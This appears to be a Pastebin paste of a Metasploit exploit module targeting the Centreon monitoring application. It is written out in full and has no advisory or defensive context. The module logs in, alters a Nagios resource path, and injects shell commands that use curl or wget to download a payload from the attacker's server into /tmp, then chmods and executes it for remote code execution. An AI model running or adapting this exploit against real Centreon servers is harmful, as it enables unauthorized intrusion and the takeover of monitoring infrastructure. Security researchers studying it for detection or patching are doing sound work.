Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ##
- # This module requires Metasploit: https://metasploit.com/download
- # Current source: https://github.com/rapid7/metasploit-framework
- ##
- class MetasploitModule < Msf::Exploit::Remote
- Rank = NormalRanking
- include Msf::Exploit::Remote::HttpClient
- include Msf::Exploit::Remote::HttpServer::HTML
- include Msf::Exploit::EXE
- def initialize(info = {})
- super(update_info(info,
- "Name" => "Centreon RCE",
- "Description" => %q{
- rce
- },
- "License" => MSF_LICENSE,
- "Platform" => "linux",
- "Targets" => [
- ["Centreon", {}],
- ],
- "Stance" => Msf::Exploit::Stance::Aggressive,
- "Privileged" => false,
- "DisclosureDate" => "Sep 17 2019",
- "DefaultOptions" => {
- "SRVPORT" => 80,
- },
- "DefaultTarget" => 0))
- register_options(
- [
- OptString.new("TARGETURI", [true, "The URI of the Centreon Application", "/centreon"]),
- OptString.new("METHOD", [true, "Method", "curl"]),
- OptString.new("USERNAME", [true, "The URI of the Centreon Application", "admin"]),
- OptString.new("PASSWORD", [true, "The URI of the Centreon Application", ""]),
- OptInt.new("HTTPDELAY", [false, "Number of seconds the web server will wait before termination", 10]),
- ]
- )
- end
- def check
- res = send_request_cgi(
- "uri" => normalize_uri(target_uri.path, "index.php"),
- "method" => "GET",
- )
- @phpsessid = res.get_cookies
- /centreon_token\".*value=\"(?<token>.*?)\"/ =~ res.body
- if token
- print_status("Successfully got token #{token}")
- res = send_request_cgi!(
- "uri" => normalize_uri(target_uri.path, "index.php"),
- "method" => "POST",
- "cookie" => @phpsessid,
- "vars_post" => {
- "useralias" => datastore["USERNAME"],
- "password" => datastore["PASSWORD"],
- "centreon_token" => token,
- },
- )
- if res.body.include? "You need to enable JavaScript to run this app"
- Exploit::CheckCode::Appears
- else
- Exploit::CheckCode::Unknown
- end
- end
- end
- def exploit
- begin
- res = send_request_cgi(
- "uri" => normalize_uri(target_uri.path, "index.php"),
- "method" => "GET",
- )
- @phpsessid = res.get_cookies
- /centreon_token\".*value=\"(?<token>.*?)\"/ =~ res.body
- if token
- print_status("Successfully got token #{token}")
- res = send_request_cgi!(
- "uri" => normalize_uri(target_uri.path, "index.php"),
- "method" => "POST",
- "cookie" => @phpsessid,
- "vars_post" => {
- "useralias" => datastore["USERNAME"],
- "password" => datastore["PASSWORD"],
- "centreon_token" => token,
- },
- )
- if res.body.include? "You need to enable JavaScript to run this app"
- res = send_request_cgi(
- "uri" => normalize_uri(target_uri.path, "main.get.php"),
- "method" => "GET",
- "cookie" => @phpsessid,
- "vars_get" => {
- "p" => "60904",
- "o" => "c",
- "resource_id" => 1,
- },
- )
- /centreon_token\".*value=\"(?<token>.*?)\"/ =~ res.body
- /resource_line\".*value=\"(?<old_path>.*?)\"/ =~ res.body
- @old_path = old_path
- res = send_request_cgi(
- "uri" => normalize_uri(target_uri.path, "main.get.php", "?p=60904"),
- "method" => "POST",
- "cookie" => @phpsessid,
- "vars_post" => { "resource_name": "$USER1$", "resource_line": "/", "instance_id": 1, "resource_activate": 1, "resource_comment": "Nagios Plugins Path", "submitC": "Save", "resource_id": 1, "o": "c", "initialValues": "" "a:0:{}" "", "centreon_token": token },
- )
- begin
- Timeout.timeout(datastore["HTTPDELAY"]) { super }
- rescue Timeout::Error
- print_good("timeout")
- vprint_error("timeout")
- end
- else
- vprint_error("Cannot login")
- end
- else
- vprint_error("Couldn't get token")
- end
- rescue ::Rex::ConnectionError
- vprint_error("Connection error")
- end
- end
- def primer
- @pl = generate_payload_exe
- @path = service.resources.keys[0]
- binding_ip = srvhost_addr
- proto = datastore["SSL"] ? "https" : "http"
- payload_uri = "#{proto}://#{binding_ip}/#{@path}"
- send_payload(payload_uri)
- end
- def send_payload(payload_uri)
- if datastore["method"] == "curl"
- payload = "/bin/bash -c \"curl #{payload_uri} -o /tmp/#{@path}\""
- else
- payload = "/bin/bash -c \"wget #{payload_uri} -O /tmp/#{@path}\""
- end
- res = send_request_cgi(
- "uri" => normalize_uri(target_uri.path, "main.get.php"),
- "method" => "POST",
- "cookie" => @phpsessid,
- "vars_get" => { "p": "60801", "command_hostaddress": "", "command_example": "", "command_line": payload, "o": "p", "min": 1 },
- )
- end
- def on_request_uri(cli, req)
- print_good("#{peer} - Payload request received: #{req.uri}")
- send_response(cli, @pl)
- run_shell
- stop_service
- end
- def run_shell
- res = send_request_cgi(
- "uri" => normalize_uri(target_uri.path, "main.get.php"),
- "method" => "POST",
- "cookie" => @phpsessid,
- "vars_get" => {
- "p": "60801",
- "command_hostaddress": "",
- "command_example": "",
- "command_line": "/bin/bash -c \"chmod 777 /tmp/#{@path}\"",
- "o": "p",
- "min": 1,
- },
- )
- res = send_request_cgi(
- "uri" => normalize_uri(target_uri.path, "main.get.php"),
- "method" => "POST",
- "cookie" => @phpsessid,
- "vars_get" => {
- "p": "60801",
- "command_hostaddress": "",
- "command_example": "",
- "command_line": "/tmp/#{@path}",
- "o": "p",
- "min": 1,
- },
- )
- end
- end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement